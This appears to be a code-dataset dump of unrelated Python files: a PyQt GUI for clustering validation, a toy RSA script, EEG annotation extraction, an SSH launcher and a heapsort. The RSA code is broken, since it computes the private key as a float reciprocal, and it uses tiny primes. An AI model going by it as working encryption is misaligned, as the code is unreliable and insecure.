temp.addLayout(temp2)\r\n temp.addWidget(self.clust_text)\r\n temp.addWidget(self.clust_push)\r\n self.clusterLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.clusterLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.clusterLayout.show()\r\n \r\n def cluster(self):\r\n selected_data = []\r\n for i in self.d_view_clust.selectedIndexes():\r\n selected_data.append(i.row())\r\n if len(self.d_view_clust.selectedIndexes()) == 0:\r\n print(\"EMPTY\")\r\n else:\r\n for data_i in selected_data:\r\n if self.kmeans.isChecked():\r\n result = []\r\n for i in range(2, int(self.clust_text.text()) +1):\r\n estimator = KMeans(init='k-means++', n_clusters = i, n_init=10, max_iter = 1000)\r\n estimator.fit(self.data[data_i])\r\n result.append([x + 1 for x in estimator.labels_ ])\r\n self.label.extend(result)\r\n self.label_b.append(result)\r\n for i in result:\r\n self.label_dict[len(self.label_dict) + 1] = [\"Kmeans \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]), len(self.data[data_i]),1, \"ID \" + str(data_i)]\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [\"Kmeans\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n if self.average.isChecked():\r\n result = []\r\n for i in range(2, int(self.clust_text.text()) +1):\r\n estimator = AgglomerativeClustering(linkage='average', n_clusters = i)\r\n estimator.fit(self.data[data_i])\r\n result.append([x + 1 for x in estimator.labels_ ])\r\n self.label.extend(result)\r\n self.label_b.append(result)\r\n\r\n for i in result:\r\n self.label_dict[len(self.label_dict) + 1] = [\"Average \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [\"Average\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n if self.complete.isChecked():\r\n result = []\r\n for i in range(2, int(self.clust_text.text()) +1):\r\n estimator = AgglomerativeClustering(linkage='complete', n_clusters = i)\r\n estimator.fit(self.data[data_i])\r\n result.append([x + 1 for x in estimator.labels_ ])\r\n self.label.extend(result)\r\n self.label_b.append(result)\r\n for i in result:\r\n self.label_dict[len(self.label_dict) + 1] = [\"Complete \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [\"Complete\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n if self.ward.isChecked():\r\n result = []\r\n for i in range(2, int(self.clust_text.text()) +1):\r\n estimator = AgglomerativeClustering(linkage='ward', n_clusters = i)\r\n estimator.fit(self.data[data_i])\r\n result.append([x + 1 for x in estimator.labels_ ])\r\n self.label.extend(result)\r\n self.label_b.append(result)\r\n for i in result:\r\n self.label_dict[len(self.label_dict) + 1] = [\"Ward \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [\"Ward\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n if self.spectral.isChecked():\r\n result = []\r\n for i in range(2, int(self.clust_text.text()) +1):\r\n estimator = SpectralClustering(n_clusters = i, affinity = \"nearest_neighbors\", n_neighbors= 15, n_init = 100 )\r\n estimator.fit(self.data[data_i])\r\n result.append([x + 1 for x in estimator.labels_ ])\r\n self.label.extend(result)\r\n self.label_b.append(result)\r\n for i in result:\r\n self.label_dict[len(self.label_dict) + 1] = [\"Spectral \" + str(len(np.unique(i)))+ \" of dataset \" + (self.data_dict[data_i+1][0]) ,len(self.data[data_i]),1, \"ID \" + str(data_i) ]\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [\"Spectral\" + self.clust_text.text() + self.data_dict[data_i+1][0] ]\r\n \r\n def internal_validate(self):\r\n temp = QVBoxLayout()\r\n temp2 = QHBoxLayout()\r\n self.internalLayout = QWidget()\r\n self.d_view_internal = QListWidget()\r\n self.internal_push = QPushButton(\"Cluster\")\r\n self.internal_push.clicked.connect(self.internal)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.d_view_internal.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.data_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.data_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.d_view_internal.addItem(item) \r\n self.sil =QCheckBox(\"Silhouette\")\r\n self.db = QCheckBox(\"Db\")\r\n self.xb = QCheckBox(\"Xie_biene\")\r\n self.dunn = QCheckBox(\"Dunn\")\r\n self.ch = QCheckBox(\"CH\")\r\n \r\n temp2.addWidget(self.sil)\r\n temp2.addWidget(self.db)\r\n temp2.addWidget(self.xb)\r\n temp2.addWidget(self.dunn)\r\n temp2.addWidget(self.ch)\r\n \r\n temp.addStretch(1)\r\n temp.addWidget(self.d_view_internal)\r\n \r\n self.l_view_internal = QListWidget()\r\n self.l_view_internal.setWindowTitle(\"Label view\")\r\n self.l_view_internal.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n \r\n \r\n \r\n for i in range(1, len(self.label_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.label_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.l_view_internal.addItem(item)\r\n \r\n temp.addLayout(temp2)\r\n temp.addWidget(self.l_view_internal)\r\n temp.addWidget(self.internal_push)\r\n self.internalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.internalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.internalLayout.show()\r\n \r\n def internal(self):\r\n data_validated = self.data[self.d_view_internal.selectedIndexes()[0].row()]\r\n label_validated_index = []\r\n for i in self.l_view_internal.selectedIndexes():\r\n label_validated_index.append(i.row())\r\n for i in label_validated_index:\r\n result = []\r\n label_validated = self.label[i]\r\n num_k = np.unique(label_validated)\r\n \r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n \r\n if self.sil.isChecked():\r\n result.append(silhouette_score(data_validated, label_validated, metric = 'euclidean'))\r\n else:\r\n result.append(\"NA\")\r\n if self.db.isChecked():\r\n result.append(inter_index.dbi(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.xb.isChecked():\r\n result.append(inter_index.xie_benie(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.dunn.isChecked():\r\n result.append(inter_index.dunn(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.ch.isChecked():\r\n result.append(inter_index.CH(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n \r\n self.internal_index.append(result)\r\n temp = [self.data_dict[self.d_view_internal.selectedIndexes()[0].row() + 1][0], self.label_dict[i+1][0]]\r\n \r\n temp.extend(result)\r\n self.internal_dict[len(self.internal_dict) + 1 ] = temp\r\n \r\n def internal_validate_b(self):\r\n temp = QVBoxLayout()\r\n temp2 = QHBoxLayout()\r\n self.internalLayout = QWidget()\r\n self.d_view_internal = QListWidget()\r\n self.internal_push = QPushButton(\"Cluster\")\r\n self.internal_push.clicked.connect(self.internal_b)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.d_view_internal.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.data_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.data_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.d_view_internal.addItem(item) \r\n self.sil =QCheckBox(\"Silhouette\")\r\n self.db = QCheckBox(\"Db\")\r\n self.xb = QCheckBox(\"Xie_biene\")\r\n self.dunn = QCheckBox(\"Dunn\")\r\n self.ch = QCheckBox(\"CH\")\r\n\r\n self.I = QCheckBox(\"I\")\r\n self.SD = QCheckBox(\"SD\")\r\n self.SDb_w = QCheckBox(\"SBb_w\")\r\n self.CVNN = QCheckBox(\"CVNN\")\r\n \r\n temp2.addWidget(self.sil)\r\n temp2.addWidget(self.db)\r\n temp2.addWidget(self.xb)\r\n temp2.addWidget(self.dunn)\r\n temp2.addWidget(self.ch)\r\n temp2.addWidget(self.I)\r\n temp2.addWidget(self.SD)\r\n temp2.addWidget(self.SDb_w)\r\n temp2.addWidget(self.CVNN)\r\n \r\n temp.addStretch(1)\r\n temp.addWidget(self.d_view_internal)\r\n \r\n self.l_view_internal = QListWidget()\r\n self.l_view_internal.setWindowTitle(\"Label view\")\r\n self.l_view_internal.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n \r\n \r\n \r\n for i in range(1, len(self.label_b_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.label_b_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.l_view_internal.addItem(item)\r\n \r\n temp.addLayout(temp2)\r\n temp.addWidget(self.l_view_internal)\r\n temp.addWidget(self.internal_push)\r\n self.internalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.internalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.internalLayout.show()\r\n \r\n def internal_b(self):\r\n scatL = []\r\n distL = []\r\n comL = []\r\n sepL = []\r\n data_validated = self.data[self.d_view_internal.selectedIndexes()[0].row()]\r\n label_validated_index = []\r\n for i in self.l_view_internal.selectedIndexes():\r\n label_validated_index.append(i.row())\r\n for i in label_validated_index:\r\n \r\n labels_validated = self.label_b[i]\r\n result_over_k = []\r\n if self.SD.isChecked():\r\n for label_validated in labels_validated:\r\n num_k = np.unique(label_validated)\r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n scat , dis = inter_index.SD_valid(data_validated, label_validated)\r\n scatL.append(scat)\r\n distL.append(dis)\r\n if self.CVNN.isChecked():\r\n for label_validated in labels_validated:\r\n num_k = np.unique(label_validated)\r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n com , sep = inter_index.CVNN(data_validated, label_validated)\r\n comL.append(com)\r\n sepL.append(sep)\r\n \r\n for label_validated in labels_validated:\r\n result = []\r\n num_k = np.unique(label_validated)\r\n \r\n inter_index = internal_validation.internalIndex(len(num_k))\r\n\r\n \r\n if self.sil.isChecked():\r\n result.append(silhouette_score(data_validated, label_validated, metric = 'euclidean'))\r\n else:\r\n result.append(\"NA\")\r\n if self.db.isChecked():\r\n result.append(inter_index.dbi(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.xb.isChecked():\r\n result.append(inter_index.xie_benie(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.dunn.isChecked():\r\n result.append(inter_index.dunn(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.ch.isChecked():\r\n result.append(inter_index.CH(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.I.isChecked():\r\n result.append(inter_index.I(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.SD.isChecked():\r\n result.append(inter_index.SD_valid_n(scatL, distL))\r\n else:\r\n result.append(\"NA\")\r\n if self.SDb_w.isChecked():\r\n result.append(inter_index.SDbw(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.CVNN.isChecked():\r\n result.append(inter_index.CVNN_n(comL, sepL))\r\n else:\r\n result.append(\"NA\")\r\n result_over_k.append(result)\r\n temp = [self.data_dict[self.d_view_internal.selectedIndexes()[0].row() + 1][0], self.label_b_dict[i+1][0]+ str(len(num_k))] \r\n temp.extend(result)\r\n self.internal_dict[len(self.internal_dict) + 1 ] = temp\r\n self.internal_index.append(result_over_k)\r\n self.internal_dict_b[len(self.internal_dict_b) + 1] = self.label_b_dict[i+1][0]\r\n print(self.internal_index)\r\n \r\n def external_validate(self):\r\n temp = QVBoxLayout()\r\n temp2 = QHBoxLayout()\r\n self.externalLayout = QWidget()\r\n self.d_view_external = QListWidget()\r\n self.external_push = QPushButton(\"Cluster\")\r\n self.external_push.clicked.connect(self.external_b)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.d_view_external.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.gt_dict) + 1):\r\n item = QListWidgetItem()\r\n item.setText(str(self.gt_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.d_view_external.addItem(item) \r\n self.nmi =QCheckBox(\"NMI\")\r\n self.adjr = QCheckBox(\"Adjusted Rand\")\r\n self.accu = QCheckBox(\"Accuracy\")\r\n self.jacc = QCheckBox(\"Jaccard\")\r\n \r\n temp2.addWidget(self.nmi)\r\n temp2.addWidget(self.adjr)\r\n temp2.addWidget(self.accu)\r\n temp2.addWidget(self.jacc)\r\n \r\n temp.addStretch(1)\r\n temp.addWidget(self.d_view_external)\r\n \r\n self.l_view_external = QListWidget()\r\n self.l_view_external.setWindowTitle(\"Label view\")\r\n self.l_view_external.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n \r\n \r\n \r\n for i in range(1, len(self.label_b_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.label_b_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.l_view_external.addItem(item)\r\n \r\n temp.addLayout(temp2)\r\n temp.addWidget(self.l_view_external)\r\n temp.addWidget(self.external_push)\r\n self.externalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.externalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.externalLayout.show()\r\n\r\n def external_b(self):\r\n data_validated = self.gt[self.d_view_external.selectedIndexes()[0].row()][0]\r\n label_validated_index = []\r\n for i in self.l_view_external.selectedIndexes():\r\n label_validated_index.append(i.row())\r\n print(\"DONE\")\r\n for i in label_validated_index:\r\n \r\n labels_validated = self.label_b[i]\r\n result_over_k = []\r\n for label_validated in labels_validated:\r\n result = []\r\n num_k = np.unique(label_validated)\r\n print(len(data_validated))\r\n print(len(label_validated))\r\n \r\n if self.nmi.isChecked():\r\n result.append(normalized_mutual_info_score(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.adjr.isChecked():\r\n result.append(adjusted_rand_score(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.accu.isChecked():\r\n result.append(accuracy(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n if self.jacc.isChecked():\r\n result.append(jaccard_similarity_score(data_validated, label_validated))\r\n else:\r\n result.append(\"NA\")\r\n result_over_k.append(result)\r\n temp = [self.gt_dict[self.d_view_external.selectedIndexes()[0].row() + 1][0], self.label_b_dict[i+1][0]+ str(len(num_k))] \r\n temp.extend(result)\r\n self.external_dict[len(self.external_dict) + 1 ] = temp\r\n self.external_index.append(result_over_k)\r\n self.external_dict_b[len(self.external_dict_b) + 1 ] = self.label_b_dict[i+1][0]\r\n print(\"DONE\")\r\n \r\n# \r\n def exportInternal(self):\r\n temp = QVBoxLayout()\r\n self.exportInternalLayout = QWidget()\r\n self.internal_view_export = QListWidget()\r\n self.internal_export_push = QPushButton(\"Export\")\r\n self.internal_export_push.clicked.connect(self._exportInternal)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.internal_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.internal_view_export.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.internal_dict_b) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.internal_dict_b[i]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.internal_view_export.addItem(item)\r\n temp.addStretch(1)\r\n temp.addWidget(self.internal_view_export)\r\n temp.addWidget(self.internal_export_push)\r\n self.exportInternalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.exportInternalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.exportInternalLayout.show()\r\n \r\n def _exportInternal(self):\r\n selected_data = []\r\n for i in self.internal_view_export.selectedIndexes():\r\n selected_data.append(i.row())\r\n name_to_export = [self.internal_dict_b[i+1] + 'internal.csv' for i in selected_data]\r\n internal_to_export = [self.internal_index[i] for i in selected_data]\r\n if len(self.internal_view_export.selectedIndexes()) == 0:\r\n print(\"EMPTY\")\r\n else:\r\n for i in range(len(selected_data)):\r\n to_export = np.transpose(internal_to_export[i])\r\n print(to_export)\r\n to_export = table_result(to_export,[['k' + str(i) for i in range(2, len(to_export[0]) + 2 )]] ,[['','Sil', 'Db', 'Xb', 'Dunn', 'CH', \"I\", \"SD\", \"SDb_w\", \"CVNN\"]] )\r\n \r\n writeRows(name_to_export[i] , to_export)\r\n\r\n def exportExternal(self):\r\n temp = QVBoxLayout()\r\n self.exportExternalLayout = QWidget()\r\n self.external_view_export = QListWidget()\r\n self.external_export_push = QPushButton(\"Export\")\r\n self.external_export_push.clicked.connect(self._exportExternal)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.external_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.external_view_export.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.external_dict_b) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.external_dict_b[i]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.external_view_export.addItem(item)\r\n temp.addStretch(1)\r\n temp.addWidget(self.external_view_export)\r\n temp.addWidget(self.external_export_push)\r\n self.exportExternalLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.exportExternalLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.exportExternalLayout.show()\r\n \r\n def _exportExternal(self):\r\n selected_data = []\r\n for i in self.external_view_export.selectedIndexes():\r\n selected_data.append(i.row())\r\n print(selected_data)\r\n name_to_export = [self.external_dict_b[i+1] + 'external.csv' for i in selected_data]\r\n print(name_to_export)\r\n external_to_export = [self.external_index[i] for i in selected_data]\r\n print(external_to_export)\r\n if len(self.external_view_export.selectedIndexes()) == 0:\r\n print(\"EMPTY\")\r\n else:\r\n for i in range(len(selected_data)):\r\n to_export = np.transpose(external_to_export[i])\r\n print(to_export)\r\n to_export = table_result(to_export,[['k' + str(i) for i in range(2, len(to_export[0]) + 2 )]] ,[['','NMI', 'Adjusted Rand', \"Accuracy\", \"Jaccard\"]] )\r\n \r\n writeRows(name_to_export[i] , to_export)\r\n \r\n def exportLabel(self):\r\n temp = QVBoxLayout()\r\n self.exportLabelLayout = QWidget()\r\n self.label_view_export = QListWidget()\r\n self.label_export_push = QPushButton(\"Export\")\r\n self.label_export_push.clicked.connect(self._exportLabel)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.label_view_export.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.label_view_export.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.label_b_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.label_b_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.label_view_export.addItem(item)\r\n temp.addStretch(1)\r\n temp.addWidget(self.label_view_export)\r\n temp.addWidget(self.label_export_push)\r\n self.exportLabelLayout.setLayout(temp)\r\n self.mdi.addSubWindow(self.exportLabelLayout)\r\n self.mdi.cascadeSubWindows()\r\n self.exportLabelLayout.show()\r\n \r\n def _exportLabel(self):\r\n selected_data = []\r\n for i in self.label_view_export.selectedIndexes():\r\n selected_data.append(i.row())\r\n name_to_export = [self.label_b_dict[i+1][0] + '.csv' for i in selected_data]\r\n print(name_to_export)\r\n label_to_export = [self.label_b[i] for i in selected_data]\r\n print(label_to_export)\r\n if len(self.label_view_export.selectedIndexes()) == 0:\r\n print(\"EMPTY\")\r\n else:\r\n for i in range(len(selected_data)):\r\n writeRows(name_to_export[i], np.transpose(label_to_export[i]))\r\n \r\n","repo_name":"clslabMSU/clustGUI","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":39396,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"39277134826","text":"import random\nfrom halo import Halo\n\ndef is_prime(num):\n ans = True\n for i in range(2, num):\n if num % i == 0:\n ans = False\n break\n return ans\n\n\ndef key_gen():\n spinner = Halo(text=\"Generating key...\", spinner=\"dots\")\n spinner.start()\n \n primes = [i for i in range(1000, 10000) if is_prime(i)]\n p = random.choice(primes)\n q = random.choice(primes)\n n = p * q\n fn = (p - 1) * (q - 1)\n\n while True:\n e = random.randint(2, n)\n if e % 2 == 1:\n relatively_prime = True\n for i in range(2, e):\n if e % i == 0 and fn % i == 0:\n relatively_prime = False\n break\n if relatively_prime:\n break\n\n d = (e ** -1) % fn\n public_keys = [e, n]\n private_keys = [d, n]\n\n spinner.stop()\n print(\"Key generated\")\n \n return [public_keys, private_keys]\n\n\ndef encrypt(text):\n keys = key_gen()\n public_keys = keys[0]\n private_keys = keys[1]\n \n spinner = Halo(text=\"Encrypting...\", spinner=\"dots\")\n spinner.start()\n \n e = public_keys[0]\n n = public_keys[1]\n cipher_text = (text ** e) % n\n\n spinner.stop()\n print(\"Encryption completed\")\n \n return [cipher_text, private_keys]\n\n\ndef decrypt(rsa):\n spinner = Halo(text=\"Decrypting...\", spinner=\"dots\")\n spinner.start()\n \n cipher_text = rsa[0]\n private_keys = rsa[1]\n\n d = private_keys[0]\n n = private_keys[1]\n\n original_text = (cipher_text ** d) % n\n # original_text = [chr(char) for char in ascii_text]\n\n spinner.stop()\n print(\"Decryption completed\")\n \n return original_text\n\n\nplain_text = int(input(\"Enter plain text:\\n\"))\n# ascii_text = [ord(char) for char in plain_text]\nrsa = encrypt(plain_text)\n\ncipher_text = rsa[0]\nprint(f\"Cipher text is {cipher_text}\")\n\noriginal_text = decrypt(rsa)\nprint(f\"Original text is {original_text}\")","repo_name":"urmilshroff/cryptography","sub_path":"ciphers/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43586014328","text":"import mne\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef raw_eeg_pick(raw):\n ch_names = raw.info[\"ch_names\"]\n drop_ch_list = []\n marker_list = ['T1', 'T2', 'STI', 'EMG', 'ECG', 'X', 'DC', 'Pulse', 'Wave', 'Mark', 'Sp', 'SP', 'EtCO', 'E', 'Cz']\n # For some trials, Cz is problematic#\n for ch_name in ch_names:\n for marker in marker_list:\n if marker in ch_name:\n drop_ch_list.append(ch_name)\n break\n raw.drop_channels(drop_ch_list)\n return raw\n\ndef minus_av(data):\n data_av = np.mean(data, axis = 1)\n data_minus_av = data - data_av\n return data_minus_av\n\ndef normalization(data):\n # subercui: should not minus mean again here\n # for i in range(data.shape[1]):\n # mean = np.mean(data[0,i,:])\n # data[0,i,:] = data[0,i,:] - mean\n normalizer = 0.0001\n data = data / normalizer\n return data\n\ndef loc_discharge(raw, annotations):\n locs = []\n if annotations:\n data = raw.get_data()\n data_annotation = data[44,:]\n for annotation in annotations:\n locs = locs + list(np.argwhere(data_annotation == annotation).reshape(-1))\n return locs\n\nfile_list = [\"DA0570A0_1-1+.edf\",\n \"DA0570A4_1-1+.edf\", \"DA0570A5_1-1+.edf\", \"DA0570A6_1-1+.edf\", \"DA0570A7_1-1+.edf\",\n \"DA05709X_1-1+.edf\", \"DA05709Z_1-1+.edf\", \"DA10104A_1-1+.edf\",\n \"DA10104D_1-1+.edf\", \"DA10104E_1-1+.edf\",\n \"DA10104F_1-1+.edf\", \"DA10104G_1-1+.edf\", \"DA10104H_1-1+.edf\", \"DA10104I_1-1+.edf\",\n \"DA10104J_1-1+.edf\", \"DA101049_1-1+.edf\"]\n\n # DA10104A_1 is OK; DA05709R_1-1+.edf SOZ is on C4 F8; DA0570A6 is suitable for graph analysis, SOZ is on T3, T5, (F3, C3)\n # Delete noisy data: \"DA0570A1_1-1+.edf\",[5], DA10104B_1-1+.edf [4],No label data: \"DA0570A2_1-1+.edf\",[3], \"DA0570A3_1-1+.edf\",[], loss label data: DA05709R_1-1+.edf [3], DA10104C_1-1+.edf,[3,4],\n\nannotation_list = [[4], [3], [3], [4], [3], [4], [3], [3,4],\n [3], [4], [3,4], [4], [4], [3], [3], [3,4]] # only s and S included\n\nx_pos_list = []\ny_pos_list = []\nx_neg_list = []\ny_neg_list = []\nfor file, annotations in zip(file_list, annotation_list):\n raw = mne.io.read_raw_edf(file, preload=True)\n locs = loc_discharge(raw, annotations)\n raw = raw_eeg_pick(raw) # now only EEG channels\n fig = raw.copy().set_eeg_reference(ref_channels=['A1', 'A2']).pick_types(meg=False, eeg=True).notch_filter(\n freqs=50).filter(3, 70).resample(sfreq=200).plot()\n print(file)\n # np.savetxt(fname=file[:-4]+'label.txt', X=locs, fmt='%d')","repo_name":"subercui/pyGConvAT","sub_path":"EEG_data/label_generate.py","file_name":"label_generate.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35314850814","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nimport subprocess\nimport os\n\nssh_config_file = \"~/.ssh/config\"\n\n# Returns a list of all hosts\ndef get_hosts():\n\n hosts = []\n\n def parse_file(filename):\n with open(os.path.expanduser(filename)) as f:\n content = f.readlines()\n\n for line in content:\n line = line.lstrip()\n # Ignore wildcards\n if line.startswith('Host ') and not '*' in line:\n for host in line.split()[1:]:\n hosts.append(host)\n if line.startswith('Include ') and not '*' in line:\n filename = line.replace('Include ', '').rstrip()\n try:\n parse_file(filename)\n except OSError as e:\n print(e)\n\n parse_file(ssh_config_file)\n\n # Removes duplicate entries\n hosts = sorted(set(hosts))\n\n return hosts\n\n# Returns a newline seperated UFT-8 encoded string of all ssh hosts\ndef parse_hosts(hosts):\n return \"\\n\".join(hosts).encode(\"UTF-8\")\n\n# Executes wofi with the given input string\ndef show_wofi(hosts):\n\n command=\"wofi -p \\\"SSH hosts: \\\" -d -i --hide-scroll\"\n \n process = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE)\n ret = process.communicate(input=hosts)\n host, rest = ret\n return host\n\n# Switches the focus to the given id\ndef ssh_to_host(host, terminal, ssh_command):\n command = \"{terminal} \\'{ssh_command} {host}\\'\".format(terminal=terminal, ssh_command=ssh_command, host=host)\n process = subprocess.Popen(command,shell=True)\n\n# Entry point\nif __name__ == \"__main__\":\n \n parser = ArgumentParser(description=\"Wofi based ssh launcher\")\n parser.add_argument(\"terminal\", help='Terminal command to use')\n parser.add_argument(\"--ssh-command\", dest='ssh_command', default='ssh', help='ssh command to use (default=ssh)')\n args = parser.parse_args()\n\n hosts = get_hosts()\n parsed_hosts = parse_hosts(hosts)\n \n selected = show_wofi(parsed_hosts)\n \n selected_host = selected.decode('utf-8').rstrip()\n ssh_to_host(selected_host, args.terminal, args.ssh_command)\n","repo_name":"coffebar/dotfiles","sub_path":"ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"10726650196","text":"#Heapsort in python\n\n#heapify function\n#let i = root index\ndef heapify(array, mSize, root, mLess = lambda x, y : x < y):\n\t#find largest element among root and children\n\tlargest = root\n\tleft = 2*root +1\n\tright = 2*root +2\n\n\tif left < mSize and mLess(array[largest], array[left]):\n\t\tlargest = left\n\tif right < mSize and mLess(array[largest], array[right]):\n\t\tlargest = right\n\n\t#swap between largest element and root element if root isn't the largest element\n\tif(largest != root):\n\t\tarray[root], array[largest] = array[largest], array[root]\n\t\theapify(array, mSize, largest, mLess)\n\n#heapSort function\ndef heapSort(array, mLess = lambda x, y : x < y):\n\t#build max heap\n\tn = len(array)\n\tfor i in range(n //2, -1, -1):\n\t\theapify(array, n , i, mLess)\n\t\n\tfor i in range(n -1, 0, -1):\n\t\t#swap\n\t\tarray[0], array[i] = array[i], array[0]\n\t\t#heapify root element\n\t\theapify(array, i, 0, mLess)\n\treturn","repo_name":"sarunnut1236/BasicSortingAlgorithms","sub_path":"heapSort/heapSort.py","file_name":"heapSort.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7936848571","text":"import sys\nsys.stdin = open('test.txt', 'r')\n\ndef solution(A):\n A = sorted(set(A))\n\n i = 0\n while i < len(A) and A[i] <= 0:\n A.pop(0)\n i += 1\n\n 